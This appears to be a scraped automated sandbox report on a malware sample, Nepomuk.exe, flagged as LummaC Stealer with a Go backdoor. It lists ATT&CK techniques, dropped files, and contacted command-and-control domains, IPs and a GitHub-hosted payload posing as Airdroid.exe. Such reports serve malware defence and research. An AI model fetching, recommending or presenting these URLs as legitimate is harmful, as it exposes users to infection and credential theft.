                    Source: C:\Users\user\Desktop\Nepomuk.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeDirectory queried: C:\Users\user\DocumentsJump to behavior

                    Remote Access Functionality

                    barindex
                    Yara detected GO Backdoor
                    Source: Yara matchFile source: 0000000D.00000002.2472257494.000000000447C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2472321608.00000000049AC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2472257494.0000000004508000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: T68WJ1SM1U30WFLN7XXTLWOX8.exe PID: 5852, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: T68WJ1SM1U30WFLN7XXTLWOX8.exe PID: 4508, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: T68WJ1SM1U30WFLN7XXTLWOX8.exe PID: 1732, type: MEMORYSTR
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: 00000000.00000003.1356159060.0000000003F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1359025401.0000000003F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1466158005.0000000003F8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Nepomuk.exe PID: 7724, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.Nepomuk.exe.1550000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Nepomuk.exe.3550000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Nepomuk.exe.1550000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1471964767.0000000001550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure1
                    Valid Accounts                    		12
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services111
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    Data Encrypted for Impact
                    CredentialsDomainsDefault Accounts12
                    Native API                    		1
                    Valid Accounts                    		1
                    Valid Accounts                    		3
                    Obfuscated Files or Information                    		111
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol31
                    Data from Local System                    		21
                    Encrypted Channel                    		Exfiltration Over Bluetooth1
                    System Shutdown/Reboot
                    Email AddressesDNS ServerDomain Accounts12
                    Command and Scripting Interpreter                    		11
                    Windows Service                    		11
                    Access Token Manipulation                    		11
                    Software Packing                    		Security Account Manager1
                    System Service Discovery                    		SMB/Windows Admin Shares1
                    Screen Capture                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts12
                    Service Execution                    		1
                    Registry Run Keys / Startup Folder                    		11
                    Windows Service                    		1
                    DLL Side-Loading                    		NTDS12
                    File and Directory Discovery                    		Distributed Component Object Model111
                    Input Capture                    		3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts1
                    PowerShell                    		Network Logon Script11
                    Process Injection                    		1
                    Masquerading                    		LSA Secrets26
                    System Information Discovery                    		SSH2
                    Clipboard Data                    		114
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                    Registry Run Keys / Startup Folder                    		1
                    Valid Accounts                    		Cached Domain Credentials661
                    Security Software Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items331
                    Virtualization/Sandbox Evasion                    		DCSync331
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                    Access Token Manipulation                    		Proc Filesystem2
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                    Process Injection                    		/etc/passwd and /etc/shadow11
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1663719 Sample: Nepomuk.exe Startdate: 12/04/2025 Architecture: WINDOWS Score: 100 39 quantyu.bet 2->39 41 soursopsf.run 2->41 43 3 other IPs or domains 2->43 61 Suricata IDS alerts for network traffic 2->61 63 Found malware configuration 2->63 65 Antivirus detection for URL or domain 2->65 67 11 other signatures 2->67 9 Nepomuk.exe 1 2->9         started        14 T68WJ1SM1U30WFLN7XXTLWOX8.exe 2->14         started        16 T68WJ1SM1U30WFLN7XXTLWOX8.exe 2->16         started        signatures3 process4 dnsIp5 49 github.com 140.82.114.3, 443, 49728 GITHUBUS United States 9->49 51 raw.githubusercontent.com 185.199.111.133, 443, 49729 FASTLYUS Netherlands 9->51 53 changeaie.top 104.21.42.7, 443, 49716, 49717 CLOUDFLARENETUS United States 9->53 37 C:\Users\...\T68WJ1SM1U30WFLN7XXTLWOX8.exe, PE32 9->37 dropped 77 Detected unpacking (creates a PE file in dynamic memory) 9->77 79 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 9->79 81 Query firmware table information (likely to detect VMs) 9->81 85 8 other signatures 9->85 18 T68WJ1SM1U30WFLN7XXTLWOX8.exe 2 9->18         started        55 194.28.226.181, 443, 49738, 49745 SYSTEM-LTD-ASRU Russian Federation 14->55 57 91.212.166.19, 443, 49739, 49746 MOBILY-ASEtihadEtisalatCompanyMobilySA United Kingdom 14->57 59 4 other IPs or domains 14->59 83 Suspicious powershell command line found 14->83 23 powershell.exe 14->23         started        25 powershell.exe 16->25         started        file6 signatures7 process8 dnsIp9 45 185.121.233.152, 28150, 49731 IPCORE-ASES Spain 18->45 47 46.8.232.106, 443, 49730, 49732 FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics Russian Federation 18->47 35 C:\Users\user\AppData\...35rEXDJiACHo.exe, PE32 18->35 dropped 69 Multi AV Scanner detection for dropped file 18->69 71 Suspicious powershell command line found 18->71 73 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 18->73 75 Contains functionality to detect sleep reduction / modifications 18->75 27 powershell.exe 1 11 18->27         started        29 conhost.exe 23->29         started        31 conhost.exe 25->31         started        file10 signatures11 process12 process13 33 conhost.exe 27->33         started       

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Nepomuk.exe49%VirustotalBrowse
                    Nepomuk.exe53%ReversingLabsWin32.Malware.Heuristic
                    SAMPLE100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\NrEXDJiACHo.exe25%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exe25%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://changeaie.top/gepslite5100%Avira URL Cloudmalware
                    https://changeaie.top/gepsoh100%Avira URL Cloudmalware
                    https://changeaie.top/gepsO100%Avira URL Cloudmalware
                    https://changeaie.top/gepsZ100%Avira URL Cloudmalware
                    https://changeaie.top/gepsCO.100%Avira URL Cloudmalware
                    https://changeaie.top/gepse0R100%Avira URL Cloudmalware
                    https://changeaie.top/gepsj100%Avira URL Cloudmalware
                    https://changeaie.top/geps5100%Avira URL Cloudmalware
                    quantyu.bet/AOSkwi100%Avira URL Cloudmalware
                    https://91.212.166.19:443/0%Avira URL Cloudsafe
                    https://46.8.236.61:443/0%Avira URL Cloudsafe
                    https://38.244.132.66:443/0%Avira URL Cloudsafe
                    https://194.28.226.181:443/0%Avira URL Cloudsafe
                    https://changeaie.top/n100%Avira URL Cloudmalware

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    github.com
                    		140.82.114.3
                    		truefalse
                      		high
                      raw.githubusercontent.com
                      		185.199.111.133
                      		truefalse
                        		high
                        changeaie.top
                        		104.21.42.7
                        		truefalse
                          		high
                          soursopsf.run
                          		unknown
                          		unknownfalse
                            		high
                            quantyu.bet
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              upmodini.digital/gokkfalse
                                		high
                                https://147.45.196.157:443/false
                                  		high
                                  changeaie.top/gepsfalse
                                    		high
                                    https://193.187.172.163:443/false
                                      		high
                                      https://46.8.232.106:443/false
                                        		high
                                        easyupgw.live/eoszfalse
                                          		high
                                          zestmodp.top/zedafalse
                                            		high
                                            https://raw.githubusercontent.com/DLMKER/LeryStable/refs/heads/main/Airdroid.exefalse
                                              		high
                                              liftally.top/xasjfalse
                                                		high
                                                quantyu.bet/AOSkwitrue
                                                • Avira URL Cloud: malware
                                                		unknown
                                                soursopsf.run/gsoiaofalse
                                                  		high
                                                  salaccgfa.top/gsoozfalse
                                                    		high
                                                    https://91.212.166.19:443/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://38.244.132.66:443/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://46.8.236.61:443/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://194.28.226.181:443/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    xcelmodo.run/nahdfalse
                                                      		high
                                                      https://changeaie.top/gepsfalse
                                                        		high
                                                        https://github.com/DLMKER/LeryStable/raw/refs/heads/main/Airdroid.exefalse
                                                          		high

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://38.244.132.66:443T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2472257494.000000000450E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://github.com/DLMKER/LeryStable/raw/refs/heads/main/Airdroid.exetSbTskZp5lIVJvOyFmmmUkUmI7Nepomuk.exe, 00000000.00000003.1471118429.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472216522.000000000169F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/ac/?q=Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://147.45.196.157:443T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2472257494.0000000004500000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://github.com/DLMKER/LerNepomuk.exe, 00000000.00000003.1471465153.00000000016D1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471118429.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472362154.00000000016D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://contoso.com/Licensepowershell.exe, 0000000E.00000002.1799595112.0000000005863000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Nepomuk.exe, 00000000.00000003.1320111232.000000000171C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://changeaie.top/gepslite5Nepomuk.exe, 00000000.00000003.1329303038.000000000171D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          https://changeaie.top/gepsohNepomuk.exe, 00000000.00000003.1339975888.0000000001679000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1339840144.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471333634.0000000001678000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471118429.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350308080.0000000001678000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1391450964.000000000167A000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472216522.000000000167A000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1289528214.0000000001682000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          		unknown
                                                                          https://www.google.com/images/branding/product/ico/googleg_alldp.icoNepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://raw.githubusercontent.com/DLMKER/LeryStable/refs/heads/main/Airdroid.exeLeryStable/refs/headNepomuk.exe, 00000000.00000003.1471485052.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472145956.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000165E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://github.com/DLMKER/LeryStable/raw/refs/heads/main/Airdroid.exeiNepomuk.exe, 00000000.00000002.1472501025.0000000001713000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466407094.000000000170C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://193.187.172.163:443T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2472257494.0000000004500000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://aka.ms/pscore6lBpowershell.exe, 00000008.00000002.1537699345.00000000055F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1707394033.0000000004E01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1790189763.0000000004801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://github.com/Nepomuk.exe, 00000000.00000003.1471465153.00000000016D1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471118429.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472362154.00000000016D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiNepomuk.exe, 00000000.00000003.1320111232.000000000171C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://x1.c.lencr.org/0Nepomuk.exe, 00000000.00000003.1318339601.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://x1.i.lencr.org/0Nepomuk.exe, 00000000.00000003.1318339601.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchNepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://contoso.com/powershell.exe, 0000000E.00000002.1799595112.0000000005863000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1539712265.0000000006656000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1715113069.0000000005E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1799595112.0000000005863000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://46.8.236.61:443T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2472257494.0000000004500000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://91.212.166.19:443https://46.8.232.106:443T68WJ1SM1U30WFLN7XXTLWOX8.exe, 00000007.00000002.2473280587.00000000048EE000.00000004.00001000.00020000.00000000.sdmp, T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000A.00000002.2472321608.000000000497C000.00000004.00001000.00020000.00000000.sdmp, T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000A.00000002.2472321608.00000000049C2000.00000004.00001000.00020000.00000000.sdmp, T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000A.00000002.2472321608.00000000049C6000.00000004.00001000.00020000.00000000.sdmp, T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2472257494.0000000004510000.00000004.00001000.00020000.00000000.sdmp, T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2480140288.000000000464E000.00000004.00001000.00020000.00000000.sdmp, T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2472257494.000000000450E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://changeaie.top/gepsjNepomuk.exe, 00000000.00000003.1471096945.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472383126.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466512578.00000000016DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: malware
                                                                                                      		unknown
                                                                                                      https://raw.githubusercontent.com/DLMKER/LeryStable/refs/heads/main/Airdroid.exe&Nepomuk.exe, 00000000.00000003.1466589569.0000000001676000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://91.212.166.19:443T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2472257494.00000000044E4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://changeaie.top/gepse0RNepomuk.exe, 00000000.00000003.1339797197.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350444440.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350187617.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1338586135.00000000016F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          		unknown
                                                                                                          https://changeaie.top/gepsONepomuk.exe, 00000000.00000002.1472403308.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466457237.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1359304340.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1391276188.00000000016EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          		unknown
                                                                                                          https://github.com/DLMKER/LeryStable/raw/refs/heads/main/Airdroid.exeK&Nepomuk.exe, 00000000.00000003.1471096945.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472383126.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466512578.00000000016DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://support.mozilla.org/products/firefoxgro.allNepomuk.exe, 00000000.00000003.1319806754.000000000403D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.1537699345.00000000055F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1707394033.0000000004E01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1790189763.0000000004801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://changeaie.top/gepsCO.Nepomuk.exe, 00000000.00000003.1471096945.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472383126.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466512578.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1359304340.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                		unknown
                                                                                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94Nepomuk.exe, 00000000.00000003.1320111232.000000000171C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://raw.githubusercontent.com/$Nepomuk.exe, 00000000.00000003.1471096945.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472383126.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466512578.00000000016DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://changeaie.top/gepsZNepomuk.exe, 00000000.00000003.1350444440.0000000001700000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: malware
                                                                                                                    		unknown
                                                                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1539712265.0000000006656000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1715113069.0000000005E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1799595112.0000000005863000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgNepomuk.exe, 00000000.00000003.1320111232.000000000171C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000E.00000002.1790189763.0000000004952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000E.00000002.1790189763.0000000004952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://contoso.com/Iconpowershell.exe, 0000000E.00000002.1799595112.0000000005863000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0Nepomuk.exe, 00000000.00000003.1318339601.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://ac.ecosia.org?q=Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaNepomuk.exe, 00000000.00000003.1320111232.000000000171C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://ocsp.rootca1.amazontrust.com0:Nepomuk.exe, 00000000.00000003.1318339601.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://changeaie.top/Nepomuk.exe, 00000000.00000003.1471546361.00000000016FB000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466853863.00000000016FB000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350444440.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350187617.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466457237.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1290239149.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1392168310.00000000016FB000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472424116.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1359304340.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1391276188.00000000016EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://changeaie.top/geps5Nepomuk.exe, 00000000.00000003.1317696538.000000000171D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                          		unknown
                                                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brNepomuk.exe, 00000000.00000003.1319806754.000000000403D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 0000000E.00000002.1790189763.0000000004952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://194.28.226.181:443T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2472257494.000000000450E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://www.ecosia.org/newtab/v20Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://crl.micropowershell.exe, 0000000E.00000002.1787556992.00000000005F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgNepomuk.exe, 00000000.00000003.1320111232.000000000171C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://duckduckgo.com/chrome_newtabv20Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://46.8.232.106:443T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2472257494.0000000004500000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?Nepomuk.exe, 00000000.00000003.1318339601.0000000003FB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://changeaie.top/nNepomuk.exe, 00000000.00000003.1392168310.00000000016FB000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1359304340.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1391276188.00000000016EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                            		unknown
